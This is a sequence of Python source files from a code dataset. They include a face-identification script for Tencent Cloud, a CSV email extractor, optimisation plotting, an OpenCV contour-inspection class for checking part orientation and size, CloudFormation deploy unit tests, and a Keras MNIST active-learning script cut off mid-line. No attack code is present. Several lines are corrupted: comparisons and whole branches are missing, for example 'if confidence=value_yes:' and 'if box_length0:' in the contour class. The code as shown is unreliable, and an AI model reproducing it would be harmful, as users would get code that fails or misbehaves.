value:\n margin = item.get_margin()\n if margin:\n total = total + margin\n return float(total)\n","sub_path":"app/templatetags/launchpad_tags.py","file_name":"launchpad_tags.py","file_ext":"py","file_size_in_byte":1266,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"140492415","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nimport os\n\nfrom qcloud_image import Client\nfrom qcloud_image import CIUrl, CIFile, CIBuffer, CIUrls, CIFiles, CIBuffers\n\nappid = '#########'\nsecret_id = '##############'\nsecret_key = '#####################'\nbucket = 'faceslib'\n\nclient = Client(appid, secret_id, secret_key, bucket)\nclient.use_http()\nclient.set_timeout(30)\n\nresult = client.face_identify('group1', CIFile('./10xxl2.jpeg'))\nvalue_no=80\nvalue_yes=96\nperson=client.face_getinfo(result['data']['candidates'][0]['person_id'])\nperson_name = person['data']['person_name']\nconfidence=result['data']['candidates'][0]['confidence']\nprint(confidence)\nif confidence=value_yes:\n print('该顾客是:')\n print(person_name)\n\n# print(client.face_getinfo('person_5'))\n\n# print (client.face_newperson('person_10', ['group1',], CIFile('./10xxl1.jpeg')))\n# print (client.face_setinfo('person_10', 'Xiongxinli'))\n# print (client.face_getpersonids('group1'))\n","sub_path":"shibie.py","file_name":"shibie.py","file_ext":"py","file_size_in_byte":1108,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"421416851","text":"#emails.csv\nimport csv\nfaculty_file = csv.DictReader(open('/Users/natalieabril/ds/metis/prework/dsp/python/faculty.csv'), skipinitialspace = 'True')\n\noutfile = open('emails.csv', 'wb')\nwriter = csv.writer(outfile, delimiter = '\\n')\n\nemails=[]\n\nfor row in faculty_file:\n emails.append(row['email'])\n\nwriter.writerow(emails)\n","sub_path":"python/advanced_python_csv.py","file_name":"advanced_python_csv.py","file_ext":"py","file_size_in_byte":326,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"367169364","text":"from gradient_descent_back_tracking import *\nfrom newton_descent_back_tracking import *\nimport matplotlib.pyplot as plt\n\nif __name__ == '__main__':\n f = lambda x: x[0]**4 + x[1]**2\n x0 = [1, 1]\n\n epsilons = np.linspace(1e-3, 1e-4, 20)\n GD_times = []\n N_times = []\n i = 1\n for e in epsilons:\n print(i)\n _, time_GD = gradient_descent(x0, f, e, line_search=GD_backtrack, max_iters=1000, print_steps=False)\n _, time_N = newton_gradient_descent(x0, f, e, line_search=newton_backtrack, max_iters=1000)\n GD_times.append(time_GD)\n N_times.append(time_N)\n i += 1\n\n # print(GD_times)\n # print(N_times)\n fig = plt.figure()\n ax = fig.add_subplot(111)\n ax.plot(GD_times)\n ax.plot(N_times)\n plt.show()","sub_path":"convex_functions_algorithms/ploting_between_descents.py","file_name":"ploting_between_descents.py","file_ext":"py","file_size_in_byte":771,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"140801323","text":"import cv2\n#import matplotlib.pyplot as plt\n#import matplotlib.image as mpimg\nimport numpy as np\nimport time\n#from Quality_Measure import *\n\nclass ContourOperations:\n\tdef __init__(self):\n\t\tself.image=[]\n\t\tself.box=[]\n\t\tself.contourlist=[]\n\t\tself.contoursorted=[]\n\t\tself.contour_to_show=[]\n\t\tself.area=0.0\n\t\tself.contour_no=0\n\t\tself.dimX=0\n\t\tself.dimY=0\n\t\tself.object_threshold=100000000000\n\t\tself.image_threshold=0\n\t\tself.show_scale_factor=1.0\n\t\tself.OrientationStatus=\"UNKNOWN\"\n\t\tself.SizeStatus=\"UNKNOWN\"\n\t\tself.imageCounter=0\n\t\tself.deltaTime=0.0\n\t\tself.leadZeros=5\n\t\tself.controlImagePath=\"control_images/\"\n\t\t\n\tdef set_lastScanTime(self,time) :\n\t\tself.lastScanTime=time\n\t\t\n\tdef set_contour_no(self, contour_no):\n\t\tself.contour_no=contour_no\n\t\n\tdef list_contours(self, frame):\n\t\tblur = cv2.GaussianBlur(frame,(5,5),0)\n\t\tself.dimX , self.dimY = frame.shape[:2]\n\t\tif self.dimX>0:\n\t\t\t(cnts, _) = cv2.findContours(blur, cv2.RETR_EXTERNAL, 2)\n\t\t\t#(cnts, _) = cv2.findContours(self.image, cv2.RETR_TREE, 1)\n\t\t\t#CHAIN_APPROX_SIMPLE CV_CHAIN_APPROX_TC89_L1,CV_CHAIN_APPROX_TC89_KCOS\n\t\t\t#cv::CHAIN_APPROX_NONE = 1, cv::CHAIN_APPROX_SIMPLE = 2, cv::CHAIN_APPROX_TC89_L1 = 3, cv::CHAIN_APPROX_TC89_KCOS = 4\n\t\t\t\n\t\t\tcnts = sorted(cnts, key = cv2.contourArea, reverse = True)[:10]\n\t\t\tself.contoursorted=cnts\n\t\t\n\tdef get_selected_contour(self, frame, contour_no):\n\t\tself.list_contours(frame)\n\t\tif len(self.contoursorted)>1:\n\t\t\tself.contour_to_show=self.contoursorted[contour_no]\n\t\t\t#del contour_to_show[0]\n\t\t\t#print(\"showcontour\")\n\t\t\treturn self.contour_to_show\n\t\telse: \n\t\t\tprint(\"no contour!\")\n\t\t\treturn None \n\t\n\tdef get_selected_area(self):\n\t\tself.area=cv2.contourArea(self.contour_to_show)\n\t\treturn self.area\n\t\n\tdef set_object_threshold(self, threshold):\n\t\tself.object_threshold=threshold\n\t\n\tdef set_image_threshold(self, threshold):\n\t\tself.image_threshold=threshold\n\t\n\tdef split_colors(self,frame):\n\t\tself.dimX , self.dimY = frame.shape[:2]\n\t\tif self.dimX>0:\n\t\t\tself.blueImage,self.greenImage,self.redImage = cv2.split(frame)\n\t\t\t\n\tdef computeRedMinusGB(self, frame):\n\t\tself.dimX , self.dimY = frame.shape[:2]\n\t\tif self.dimX>0:\n\t\t\tblue, green, red = cv2.split(frame)\n\t\t\tout_frame=cv2.subtract(red,blue)\n\t\t\tout_frame=cv2.subtract(out_frame,green)\n\t\t\treturn out_frame\n\t\t\n\tdef computeThreshold(self, frame, threshold):\n\t\t#blur = cv2.GaussianBlur(frame,(5,5),0)\n\t\t#ret3,th3 = cv2.threshold(blur,0,255,cv2.THRESH_BINARY+cv2.THRESH_OTSU)\n\t\tself.dimX , self.dimY = frame.shape[:2]\n\t\tif self.dimX>0:\n\t\t\t#self.grayImage = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n\t\t\tret, thresh = cv2.threshold(frame,threshold,255,0)\n\t\t\treturn thresh\n\t\t\t\n\tdef showRed(self, show):\n\t\tif show==True: cv2.imshow('Red',self.redImage)\n\t\treturn self.redImage\n\t\t\n\tdef showGreen(self, show):\n\t\tif show==True: cv2.imshow('Green',self.greenImage)\n\t\treturn self.greenImage\n\t\t\n\tdef showBlue(self, show):\n\t\tif show==True: cv2.imshow('Blue',self.blueImage)\n\t\treturn self.blueImage\n\t\n\tdef compute_image(self,frame):\n\t\tself.dimX , self.dimY = frame.shape[:2]\n\t\tif self.dimX>0:\n\t\t\tself.grayImage = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n\t\t\tret, thresh = cv2.threshold(self.grayImage,self.image_threshold,255,0)\n\t\t\tself.image=thresh\n\t\t#cv2.imshow('Test',self.image)\n\t\n\tdef showPreview(self, show_raw, show_computed):\n\t\tif show_raw==True and show_computed==False and self.dimX>0:\n\t\t\tcv2.imshow('Threshold',self.image)\n\t\t\tcv2.imshow('Grayscale',self.grayImage)\n\t\telif show_computed==True and len(self.box)>0:\n\t\t\timg_box=cv2.cvtColor(self.image, cv2.COLOR_GRAY2BGR)\n\t\t\tbox = cv2.cv.BoxPoints(self.box) \n\t\t\tbox = np.array(box, dtype=\"int\")\n\t\t\tcv2.drawContours(img_box, [box], -1, (255, 0, 0), 2)\n\t\t\tcv2.drawContours(img_box, self.contour_to_show, -1, (0, 255, 0), 2)\n\t\t\tbox_dimensions=self.box[1]\n\t\t\tcv2.putText(img_box,\" Box Dimensions: \"+str(box_dimensions)+\" Time: \"+str(time.time()),(10,30),cv2.FONT_HERSHEY_SIMPLEX,0.45, (255, 255, 255), 2)\n\t\t\tcv2.imshow('Computed',img_box)\n\t\telif show_raw==False:\n\t\t\tcv2.destroyWindow('Threshold')\n\t\t\tcv2.destroyWindow('Grayscale')\n\t\telif show_computed==False:\n\t\t\tcv2.destroyWindow('Computed')\n\n\t\t\t\n\tdef showPixelValue(self, frame, x, y, name):\n\t\tdimX , dimY = frame.shape[:2]\n\t\tif dimX>0:\n\t\t\tcolorValue=frame[y][x]\n\t\t\tdrawFrame=cv2.cvtColor(frame, cv2.COLOR_GRAY2BGR)\n\t\t\tbox = [[x,y],[x+1,y+1]] \n\t\t\tbox = np.array(box, dtype=\"int\")\n\t\t\tcv2.drawContours(drawFrame, [box], -1, (255, 0, 255), 2)\n\t\t\tcv2.putText(drawFrame,\" Value: \"+str(colorValue),(10,30),cv2.FONT_HERSHEY_SIMPLEX,0.45, (255, 0, 255), 2)\n\t\t\tcv2.imshow(name,drawFrame)\n\t\t\n\t\t\t\n\tdef save_raw_image(self,saveSetting,objectNo, imageNo):\n\t\tnow=format(time.time(),'.2f')\n\t\tif self.OrientationStatus==\"BAD\" and (saveSetting==\"All Raw\" or saveSetting==\"All Parts\") : \n\t\t\tfilename=self.controlImagePath+\"bad_orient/\"+str(imageNo).zfill(self.leadZeros)+\"_time_\"+str(now)+\"_obj_\"+str(objectNo).zfill(self.leadZeros)+\"_bad_orient_raw.png\"\n\t\t\tcv2.imwrite(filename, self.grayImage)\n\t\telif self.OrientationStatus==\"GOOD\" and (saveSetting==\"All Raw\" or saveSetting==\"All Parts\" or saveSetting==\"All Good\" or saveSetting==\"Contours\"): \n\t\t\tfilename=self.controlImagePath+\"good/\"+str(imageNo).zfill(self.leadZeros)+\"_time_\"+str(now)+\"_obj_\"+str(objectNo).zfill(self.leadZeros)+\"_good_raw.png\"\n\t\t\tcv2.imwrite(filename, self.grayImage)\n\t\telif self.OrientationStatus==\"FLIP\" and (saveSetting==\"All Raw\" or saveSetting==\"All Parts\" or saveSetting==\"All Good\" or saveSetting==\"Contours\"): \n\t\t\tfilename=self.controlImagePath+\"flip/\"+str(imageNo).zfill(self.leadZeros)+\"_time_\"+str(now)+\"_obj_\"+str(objectNo).zfill(self.leadZeros)+\"_flip_raw.png\"\n\t\t\tcv2.imwrite(filename, self.grayImage)\n\t\telif self.SizeStatus==\"BAD\" and (saveSetting==\"All Raw\" or saveSetting==\"All Parts\"): \n\t\t\tfilename=self.controlImagePath+\"bad_size/\"+str(imageNo).zfill(self.leadZeros)+\"_time_\"+str(now)+\"_obj_\"+str(objectNo).zfill(self.leadZeros)+\"_bad_size_raw.png\"\n\t\t\tcv2.imwrite(filename, self.grayImage)\t\n\t\telif saveSetting==\"All Raw\": \n\t\t\tfilename=self.controlImagePath+\"out/\"+str(imageNo).zfill(self.leadZeros)+\"_time_\"+str(now)+\"_obj_\"+str(objectNo).zfill(self.leadZeros)+\"_out_raw.png\"\n\t\t\tcv2.imwrite(filename, self.grayImage)\n\t\t\n\tdef save_analysed_image(self,saveSetting,objectNo, imageNo):\n\t\tnow=format(time.time(),'.2f')\n\t\tif self.SizeStatus==\"BAD\" and (saveSetting==\"All Raw\" or saveSetting==\"All Parts\" or saveSetting==\"Contours\"): \n\t\t\tfilename=self.controlImagePath+\"bad_size/\"+str(imageNo).zfill(self.leadZeros)+\"_time_\"+str(now)+\"_obj_\"+str(objectNo).zfill(self.leadZeros)+\"_bad_size.png\"\n\t\t\timg_box=cv2.cvtColor(self.image, cv2.COLOR_GRAY2BGR)\n\t\t\tbox = cv2.cv.BoxPoints(self.box) \n\t\t\tbox = np.array(box, dtype=\"int\")\n\t\t\tcv2.drawContours(img_box, [box], -1, (255, 0, 0), 2)\n\t\t\tcv2.drawContours(img_box, self.contour_to_show, -1, (0, 255, 0), 2)\n\t\t\tbox_dimensions=(round(self.box[1][0],2),round(self.box[1][1],2))\n\t\t\tcv2.putText(img_box,\" Box Dimensions: \"+str(box_dimensions)+\" Max: \"+str(self.BoxMax)+\" Min: \"+str(self.BoxMin)+\" Time: \"+str(time.time()),(10,30),cv2.FONT_HERSHEY_SIMPLEX,0.45, (255, 255, 255), 2)\n\t\t\tcv2.imwrite(filename, img_box)\n\t\telif self.OrientationStatus==\"BAD\" and (saveSetting==\"All Raw\" or saveSetting==\"All Parts\"): \n\t\t\tfilename=self.controlImagePath+\"bad_orient/\"+str(imageNo).zfill(self.leadZeros)+\"_time_\"+str(now)+\"_obj_\"+str(objectNo).zfill(self.leadZeros)+\"_bad_orient.png\"\n\t\t\tcv2.imwrite(filename, self.analyzedImage)\n\t\telif self.OrientationStatus==\"FLIP\" and (saveSetting==\"All Raw\" or saveSetting==\"All Parts\" or saveSetting==\"All Good\" or saveSetting==\"Contours\"): \n\t\t\tfilename=self.controlImagePath+\"flip/\"+str(imageNo).zfill(self.leadZeros)+\"_time_\"+str(now)+\"_obj_\"+str(objectNo).zfill(self.leadZeros)+\"_flip.png\"\n\t\t\tcv2.imwrite(filename, self.analyzedImage)\n\t\telif self.OrientationStatus==\"GOOD\" and (saveSetting==\"All Raw\" or saveSetting==\"All Parts\" or saveSetting==\"All Good\" or saveSetting==\"Contours\"): \n\t\t\tfilename=self.controlImagePath+\"good/\"+str(imageNo).zfill(self.leadZeros)+\"_time_\"+str(now)+\"_obj_\"+str(objectNo).zfill(self.leadZeros)+\"_good.png\"\n\t\t\tcv2.imwrite(filename, self.analyzedImage)\n\t\t\n\t\t#filename=self.controlImagePath+\"bad_size/\"+str(imageNo).zfill(self.leadZeros)+\"_time_\"+str(now)+\"_obj_\"+str(objectNo).zfill(self.leadZeros)+\"_scanned.png\"\n\t\t#cv2.imwrite(filename, self.analyzedImage)\n\t\t#elif self.SizeStatus==\"GOOD\" :\n\t\t#self.savePicsOptions=( \"All Raw\", \"All Good\", \"All Parts\",\"Contours\",\"None\")\n\t\n\tdef load_image(self):\n\t\tself.image=cv2.imread(\"sample_images/sample.png\", 0)\n\t\tself.dimX , self.dimY = self.image.shape[:2]\n\t\n\tdef set_resize_factor(self, factor):\n\t\tself.show_scale_factor=factor\n\t\t\n\tdef image_resize(self, image):\n\t\treturn cv2.resize(image,(int(self.dimY*self.show_scale_factor),int(self.dimX*self.show_scale_factor)),interpolation = cv2.INTER_AREA)\n\t\n\tdef check_status(self):\n\t\treturn self.OrientationStatus\n\t\n\t#def show_box(self, plot_title):\n\t#\tcv2.imshow(plot_title,self.image_resize(self.check_modular_boxes()))\n\t\n\tdef set_recognition_parameters(self, BoxMax, BoxMin, EmptyBoxes):\n\t\tself.BoxMax=BoxMax\n\t\tself.BoxMin=BoxMin\n\t\tself.EmptyBoxes=EmptyBoxes\n\t\t\n\t\n\tdef check_box_dim(self):\n\t\tif self.get_selected_contour() == None:\n\t\t\tself.SizeStatus=\"BAD\"\n\t\t\treturn self.SizeStatus\n\t\tself.box = cv2.minAreaRect(self.contour_to_show)\n\t\tbox_length=max(self.box[1])\n\t\tbox_width=min(self.box[1])\n\t\tself.SizeStatus=\"BAD\"\n\t\tchecksum=0\n\t\t#check the max values\n\t\tif self.BoxMax[0]>0:\n\t\t\tif box_length0:\n\t\t\tif box_width0:\n\t\t\tif box_length>self.BoxMin[0]:\n\t\t\t\tchecksum+=1\n\t\telse :\n\t\t\tchecksum+=1\n\t\t\t\n\t\tif self.BoxMin[1]>0:\n\t\t\tif box_width>self.BoxMin[1]:\n\t\t\t\tchecksum+=1\n\t\telse :\n\t\t\tchecksum+=1\n\t\t\n\t\tif checksum>=4 :\n\t\t\t#print(\"good box! Width: \"+str(box_width)+\" length: \"+str(box_length))\n\t\t\tself.SizeStatus=\"GOOD\"\n\t\t\treturn True\n\t\telse :\n\t\t\t#print(\"bad box! Width: \"+str(box_width)+\" length: \"+str(box_length))\n\t\t\tself.SizeStatus=\"BAD\"\n\t\t\treturn False\n\n\tdef showContour(self, frame, contour):\n\t\tif contour is not None:\n\t\t\tboxrect = cv2.minAreaRect(contour)\n\t\t\tbox = cv2.cv.BoxPoints(boxrect) \n\t\t\tbox = np.array(box, dtype=\"int\")\n\t\t\t#print(\"box: \",boxrect)\n\t\t\tbox_dimensions=(round(boxrect[1][0],2),round(boxrect[1][1],2),round(boxrect[2],2))\n\t\t\tcv2.putText(frame,\" Box Dim: \"+str(box_dimensions),(10,10),cv2.FONT_HERSHEY_SIMPLEX,0.45, (255, 255, 255), 2)\n\t\t\tcv2.drawContours(frame, [box], -1, ( 0,255, 0), 2)\n\t\t\tcv2.drawContours(frame, contour, -1, (255, 0, 0), 2)\n\t\t\tcv2.imshow('Contour',frame)\n\t\t\treturn frame\n\n\tdef check_modular_boxes(self):\n\t\tif len(self.contour_to_show) <= 0:\n\t\t\tself.OrientationStatus=\"BAD\"\n\t\t\treturn self.OrientationStatus\n\t\tBlockRectanglesGood=[]\n\t\tBlockRectanglesFlip=[]\n\t\tTestResultsGood=[]\n\t\tTestResultsFlip=[]\n\t\timg_box=cv2.cvtColor(self.image, cv2.COLOR_GRAY2BGR)\n\t\tself.OrientationStatus=\"BAD\"\n\t\t#self.box = cv2.minAreaRect(self.contour_to_show)\n\t\tbox_angle=self.box[2]\n\t\tbox_dimensions=self.box[1]\n\t\tbox = cv2.cv.BoxPoints(self.box) \n\t\tbox = np.array(box, dtype=\"int\")\n\t\tcv2.drawContours(img_box, [box], -1, (255, 0, 0), 2)\n\t\tcv2.drawContours(img_box, self.contour_to_show, -1, (0, 255, 0), 2)\n\t\tif box_dimensions[0]0:\n\t\t\tboxSorted=[box[box[:,1].argmin()],box[box[:,0].argmax()],box[box[:,1].argmax()],box[box[:,0].argmin()]]\n\t\t\tboxTopLeftX=boxSorted[0][0]\n\t\t\tboxTopLeftY=boxSorted[0][1]\n\t\t\tboxTopRightX=boxSorted[1][0]\n\t\t\tboxTopRightY=boxSorted[1][1]\n\t\t\tboxBottomRightX=boxSorted[2][0]\n\t\t\tboxBottomRightY=boxSorted[2][1]\n\t\t\tboxBottomLeftX=boxSorted[3][0]\n\t\t\tboxBottomLeftY=boxSorted[3][1]\n\t\telse :\n\t\t\tmaxX=box[box[:,0].argmax()][0]\n\t\t\tmaxY=box[box[:,1].argmax()][1]\n\t\t\t\n\t\t\t#boxSorted=[box[box[:,1].argmin()],box[box[:,0].argmax()],box[box[:,1].argmax()],box[box[:,0].argmin()]]\n\t\t\tfor i in range(0,4):\n\t\t\t\tif box[i][0]==maxX :\n\t\t\t\t\tif box[i][1]==maxY :\n\t\t\t\t\t\tboxBottomRightX=box[i][0]\n\t\t\t\t\t\tboxBottomRightY=box[i][1]\n\t\t\t\t\t\t#print(\"bottomRx: \"+str(boxBottomRightX)+\" bottomRy: \"+str(boxBottomRightY))\n\t\t\t\t\telse :\n\t\t\t\t\t\tboxTopRightX=box[i][0]\n\t\t\t\t\t\tboxTopRightY=box[i][1]\n\t\t\t\t\t\t#print(\"TopRightx: \"+str(boxTopRightX)+\" TopRighty: \"+str(boxTopRightY))\n\t\t\t\telse :\n\t\t\t\t\tif box[i][1]==maxY :\n\t\t\t\t\t\tboxBottomLeftX=box[i][0]\n\t\t\t\t\t\tboxBottomLeftY=box[i][1]\n\t\t\t\t\t\t#print(\"bottomLx: \"+str(boxBottomLeftX)+\" bottomLy: \"+str(boxBottomLeftY))\n\t\t\t\t\telse :\n\t\t\t\t\t\tboxTopLeftX=box[i][0]\n\t\t\t\t\t\tboxTopLeftY=box[i][1]\n\t\t\t\t\t\t#print(\"TopLeftx: \"+str(boxTopLeftX)+\" TopLefty: \"+str(boxTopLeftY))\n\t\tboxHeightX=boxBottomLeftX-boxTopLeftX\n\t\tboxHeightY=boxBottomLeftY-boxTopLeftY\n\t\tboxWidthX=boxBottomRightX-boxBottomLeftX\n\t\tboxWidthY=boxBottomRightY-boxBottomLeftY\n\t\t#print(\"box: \",box)\n\t\t#print(\"boxWidthX :\"+str(boxWidthX)+\" boxWidthY :\"+str(boxWidthY)+\" boxHeightX :\"+str(boxHeightX)+\" boxHeightY :\"+str(boxHeightY)+\" boxTopLeftX :\"+str(boxTopLeftX)+\" boxTopLeftY :\"+str(boxTopLeftY))\n\t\tfor i in range(0,10):\n\t\t\t#print(\"EmptyBoxes: \",self.EmptyBoxes[i])\n\t\t\tif sum(self.EmptyBoxes[i])>0:\n\t\t\t\t#print(\"we draw rectangle i: \",i)\n\t\t\t\t#print(\"EmptyBoxes in if: \",self.EmptyBoxes[i])\n\t\t\t\t#print(\"BlockRect: \",BlockRectanglesGood)\n\t\t\t\tTopLeftX=boxTopLeftX+int(self.EmptyBoxes[i][0]*boxWidthX)+int(self.EmptyBoxes[i][1]*boxHeightX)\n\t\t\t\tTopLeftY=boxTopLeftY+int(self.EmptyBoxes[i][0]*boxWidthY)+int(self.EmptyBoxes[i][1]*boxHeightY)\n\t\t\t\t#print(\"WidthY :\"+str(self.EmptyBoxes[i][1]*boxWidthY)+\" HeightY: \"+str(self.EmptyBoxes[i][1]*boxHeightY))\n\t\t\t\tTopRightX=TopLeftX+int(self.EmptyBoxes[i][2]*boxWidthX)\n\t\t\t\tTopRightY=TopLeftY+int(self.EmptyBoxes[i][2]*boxWidthY)\n\t\t\t\tBottomRightX=TopRightX+int(self.EmptyBoxes[i][3]*boxHeightX)\n\t\t\t\tBottomRightY=TopRightY+int(self.EmptyBoxes[i][3]*boxHeightY)\n\t\t\t\tBottomLeftX=BottomRightX-int(self.EmptyBoxes[i][2]*boxWidthX)\n\t\t\t\tBottomLeftY=BottomRightY-int(self.EmptyBoxes[i][2]*boxWidthY)\n\t\t\t\t\n\t\t\t\tTopLeft=[TopLeftX,TopLeftY]\n\t\t\t\tTopRight=[TopRightX,TopRightY]\n\t\t\t\tBottomLeft=[BottomLeftX,BottomLeftY]\n\t\t\t\tBottomRight=[BottomRightX,BottomRightY]\n\t\t\t\tto_append=[TopLeft,TopRight,BottomRight,BottomLeft]\n\t\t\t\tto_append=np.array(to_append, dtype=\"int\")\n\t\t\t\tBlockRectanglesGood.append(to_append)\n\t\t\t\t\n\t\t\t\tBottomRightX=boxBottomRightX-int(self.EmptyBoxes[i][0]*boxWidthX)-int(self.EmptyBoxes[i][1]*boxHeightX)\n\t\t\t\tBottomRightY=boxBottomRightY-int(self.EmptyBoxes[i][0]*boxWidthY)-int(self.EmptyBoxes[i][1]*boxHeightY)\n\t\t\t\tBottomLeftX=BottomRightX-int(self.EmptyBoxes[i][2]*boxWidthX)\n\t\t\t\tBottomLeftY=BottomRightY-int(self.EmptyBoxes[i][2]*boxWidthY)\n\t\t\t\tTopLeftX=BottomLeftX-int(self.EmptyBoxes[i][3]*boxHeightX)\n\t\t\t\tTopLeftY=BottomLeftY-int(self.EmptyBoxes[i][3]*boxHeightY)\n\t\t\t\tTopRightX=TopLeftX+int(self.EmptyBoxes[i][2]*boxWidthX)\n\t\t\t\tTopRightY=TopLeftY+int(self.EmptyBoxes[i][2]*boxWidthY)\n\t\t\t\t\n\t\t\t\tTopLeft=[TopLeftX,TopLeftY]\n\t\t\t\tTopRight=[TopRightX,TopRightY]\n\t\t\t\tBottomLeft=[BottomLeftX,BottomLeftY]\n\t\t\t\tBottomRight=[BottomRightX,BottomRightY]\n\t\t\t\tto_append=[TopLeft,TopRight,BottomRight,BottomLeft]\n\t\t\t\tto_append=np.array(to_append, dtype=\"int\")\n\t\t\t\tBlockRectanglesFlip.append(to_append)\n\t\t#BlockRectanglesGood = np.array(BlockRectanglesGood, dtype=\"int\")\n\t\t#print(\"we draw rectangle points: \",len(BlockRectanglesFlip))\n\t\tstatusText=\"\"\n\t\tfor i in range(0, len(self.contour_to_show)):\n\t\t\tcontourPoint=(self.contour_to_show[i][0][0],self.contour_to_show[i][0][1])\n\t\t\tfor k in range(0, len(BlockRectanglesFlip)) :\n\t\t\t\tcv2.drawContours(img_box, [BlockRectanglesGood[k]], -1, (255, 255, 0), 2) #light blue\n\t\t\t\tcv2.drawContours(img_box, [BlockRectanglesFlip[k]], -1, (0, 255, 255), 2) #yellow\n\t\t\t\tif len(TestResultsGood)0:\n\t\t\tself.OrientationStatus=\"GOOD\"\n\t\telif max(TestResultsGood)>0 and max(TestResultsFlip)<0:\n\t\t\tself.OrientationStatus=\"FLIP\"\n\t\telse:\n\t\t\tself.OrientationStatus=\"BAD\"\t\n\t\tcv2.putText(img_box,\" Box Dimensions: \"+str(box_dimensions)+\" Time: \"+str(time.time()),(10,30),cv2.FONT_HERSHEY_SIMPLEX,0.45, (255, 255, 255), 2)\n\t\t#cv2.putText(img_box,\" Box Dimensions: \"+str(box_dimensions)+\" Time: \"+str(time.time())+\" Delta Time: \"+str(QualityMeasures['deltaTime'])+\" Delta Good: \"+str(QualityMeasures['deltaGood']),(10,30),cv2.FONT_HERSHEY_SIMPLEX,0.45, (255, 255, 255), 2)\n\t\tcv2.putText(img_box,\"ORIENTATION: \"+self.OrientationStatus+\" SIZE: \"+self.SizeStatus,(10,self.dimX-30),cv2.FONT_HERSHEY_SIMPLEX,1, (255, 255, 255), 2)\n\t\t#print(\"TestResultsFlip: \",TestResultsFlip)\n\t\t#if len(TestResultsGood)\n\t\tself.analyzedImage=img_box\n\t\treturn self.OrientationStatus","sub_path":"contour_operations.py","file_name":"contour_operations.py","file_ext":"py","file_size_in_byte":17517,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"483838752","text":"import unittest\n\nfrom unittest.mock import Mock, patch\n\nfrom minipipe import deploy_cloudformation\n\n\nclass TestHandler(unittest.TestCase):\n \"\"\"Test handler methods\"\"\"\n\n\n @patch('minipipe.cf_check_status')\n @patch('minipipe.cf_create')\n @patch('minipipe.cf_update')\n def test_cf_create(self, mock_cf_update, mock_cf_create, mock_cf_check_status):\n mock_cf_check_status.return_value = None\n deploy_cloudformation('minipipe-test', 'test')\n mock_cf_create.assert_called_once()\n\n\n @patch('minipipe.cf_check_status')\n @patch('minipipe.cf_create')\n @patch('minipipe.cf_update')\n def test_cf_update(self, mock_cf_update, mock_cf_create, mock_cf_check_status):\n mock_cf_check_status.return_value = {'Stacks': [{'StackId': 'minipipe-test'}]}\n deploy_cloudformation('minipipe-test', 'test')\n mock_cf_update.assert_called_once()\n","sub_path":"tests/test_deploy_cloudformation.py","file_name":"test_deploy_cloudformation.py","file_ext":"py","file_size_in_byte":886,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"94007022","text":"from __future__ import print_function\nfrom keras.datasets import mnist\nfrom keras.preprocessing.image import ImageDataGenerator\nfrom keras.models import Sequential\nfrom keras.layers.core import Dense, Dropout, Activation, Flatten\nfrom keras.layers.convolutional import Convolution2D, MaxPooling2D\nfrom keras.optimizers import SGD, Adadelta, Adagrad, Adam\nfrom keras.utils import np_utils, generic_utils\nfrom six.moves import range\nimport numpy as np\nimport scipy as sp\nfrom keras import backend as K \nimport random\nimport scipy.io\nimport matplotlib.pyplot as plt\nfrom keras.regularizers import l2, activity_l2\nfrom scipy.spatial.distance import pdist, squareform\nfrom scipy import linalg\n\nbatch_size = 128\nnb_classes = 10\nnb_epoch = 1\n\n# input image dimensions\nimg_rows, img_cols = 28, 28\n# number of convolutional filters to use\nnb_filters = 32\n# size of pooling area for max pooling\nnb_pool = 2\n# convolution kernel size\nnb_conv = 3\n\n# the data, shuffled and split between tran and test sets\n(X_train_All, y_train_All), (X_test, y_test) = mnist.load_data()\n\nX_train_All = X_train_All.reshape(X_train_All.shape[0], 1, img_rows, img_cols)\nX_test = X_test.reshape(X_test.shape[0], 1, img_rows, img_cols)\n\n#Find Binary Images - MBR over Binary Images only - considering only images 2 and 8\nClass_2_Train = np.where(y_train_All==2)[0]\nClass_8_Train = np.where(y_train_All==8)[0]\ny_2 = y_train_All[Class_2_Train]\nX_2 = X_train_All[Class_2_Train, :, :, :]\ny_8 = y_train_All[Class_8_Train]\nX_8 = X_train_All[Class_8_Train, :, :, :]\n\nX_train_All = np.concatenate((X_2, X_8), axis=0)\ny_train_All = np.concatenate((y_2, y_8), axis=0)\nX_train_All = X_train_All[0:10000, :, :, :]\ny_train_All = y_train_All[0:10000]\n\n\nClass_2_Test = np.where(y_test==2)[0]\nClass_8_Test = np.where(y_test==8)[0]\ny_2_test = y_test[Class_2_Test]\nX_2_test = X_test[Class_2_Test, :, :, :]\ny_8_test = y_test[Class_8_Test]\nX_8_test = X_test[Class_8_Test, :, :, :]\n\nX_test = np.concatenate((X_2_test, X_8_test), axis=0)\ny_test = np.concatenate((y_2_test, y_8_test), axis=0)\nX_test = X_test[0:2000, :, :, :]\ny_test = y_test[0:2000]\n\n\n#after 50 iterations with 10 pools - we have 500 pooled points - use validation set outside of this\nX_valid = X_train_All[2000:2150, :, :, :]\ny_valid = y_train_All[2000:2150]\n\n\n# X_train = X_train_All[0:200, :, :, :]\n# y_train = y_train_All[0:200]\n\nX_train = X_train_All[0:200, :, :, :]\ny_train = y_train_All[0:200]\n\n# X_Pool = X_train_All[5000:15000, :, :, :]\n# y_Pool = y_train_All[5000:15000]\n\nX_Pool = X_train_All[5000:7000, :, :, :]\ny_Pool = y_train_All[5000:7000]\n\n\n# X_test = X_test[0:20, :, :, :]\n# y_test = y_test[0:20]\n\n\nall_accuracy = 0\n\n#we can train the model and evaluate the test accuracy with original size of training data here\nX_train = X_train.astype('float32')\nX_test = X_test.astype('float32')\nX_valid = X_valid.astype('float32')\nX_Pool = X_Pool.astype('float32')\nX_train /= 255\nX_valid /= 255\nX_Pool /= 255\nX_test /= 255\n\nY_test = np_utils.to_categorical(y_test, nb_classes)\nY_valid = np_utils.to_categorical(y_valid, nb_classes)\nY_Pool = np_utils.to_categorical(y_Pool, nb_classes)\n\nPool_Valid_Loss = 